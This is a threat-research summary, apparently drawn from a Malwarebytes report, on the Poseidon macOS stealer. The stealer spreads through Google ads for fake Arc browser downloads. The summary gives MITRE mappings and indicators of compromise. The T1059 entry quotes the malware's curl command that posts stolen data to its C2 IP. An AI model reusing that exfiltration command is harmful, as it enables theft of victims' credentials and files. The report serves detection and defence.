Threat Research

‘Poseidon’ Mac stealer distributed through Google ads

Malwarebytes

Poseidon is a macOS stealer campaign distributed through malvertising that lures Mac users with fake Arc browser downloads via malicious Google ads. The Poseidon project is an evolution/rebranding of Atomic Stealer/OSX.RodStealer by threat actor Rodrigo4, adding features like VPN configuration theft and data exfiltration over HTTP to a remote IP and C2 at 79.137.192[.]4/p2p. #PoseidonMacStealer #AtomicStealer #OSXRodStealer #Rodrigo4 #ArcBrowser

Keypoints

  • Poseidon is a macOS stealer campaign dropped via malicious Google ads promoting the Arc browser, signaling continued use of Arc as a lure.
  • The Poseidon project is an evolution/rebranding of Atomic Stealer/OSX.RodStealer by threat actor Rodrigo4, with added features like VPN configuration theft.
  • The campaign uses malvertising: clicks lead to a fake Arc Mac site (arc-download[.]com) and a DMG installer that requires a right-click to bypass protections.
  • Poseidon’s capabilities include a file grabber, crypto wallet data, password manager theft (Bitwarden, KeePassXC), and browser data collection.
  • Data exfiltration is performed via a curl POST to an IP address, and a Poseidon panel is hosted at 79.137.192[.]4/p2p for control/monitoring.
  • Concrete IOCs include arcthost[.]org (malicious ad domain), arc-download[.]com (decoy site), zestyahhdog[.]com/Arc12645413[.]dmg (download URL), a SHA256 hash, and the C2 address.
  • Malwarebytes notes the campaign will be detected as OSX.RodStealer and recommends web protections like Malwarebytes Browser Guard to block ads and malicious sites.

MITRE Techniques

  • [T1189] Drive-by Compromise – Malicious ads deliver the Mac stealer, leveraging Google ads to lure victims. “On June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for the Arc browser.”
  • [T1555.003] Credentials in Password Stores – Theft of credentials from password managers. “The stealer offers functionalities reminescent of Atomic Stealer including: file grabber, crypto wallet extractor, password manager (Bitwarden, KeePassXC) stealer…”
  • [T1005] Data from Local System – Data collection via a file grabber as part of the stealer’s feature set. “The stealer offers functionalities reminescent of Atomic Stealer including: file grabber, crypto wallet extractor, password manager (Bitwarden, KeePassXC) stealer…”
  • [T1059] Command and Scripting Interpreter – Use of a shell command to exfiltrate data. “set result_send to (do shell script “curl -X POST -H “uuid: 399122bdb9844f7d934631745e22bd06” -H “user: H1N1_Group” -H “buildid: id777″ –data-binary @/tmp/out.zip http:// 79.137.192[.]4/p2p”)”
  • [T1071.001] Web Protocols – Data exfiltration over HTTP to a C2 address. “http:// 79.137.192[.]4/p2p” (used in the exfil command)

Indicators of Compromise

  • [Domain] arcthost[.]org – Google ad domain used to lure Mac users
  • [Domain] arc-download[.]com – Decoy site for Arc Mac download
  • [URL] zestyahhdog[.]com/Arc12645413[.]dmg – Download URL for the payload
  • [SHA256] c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05 – Payload hash
  • [IP] 79.137.192[.]4/p2p – Command and control/data exfiltration endpoint

Read more: https://www.malwarebytes.com/blog/cybercrime/2024/06/poseidon-mac-stealer-distributed-via-google-ads

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint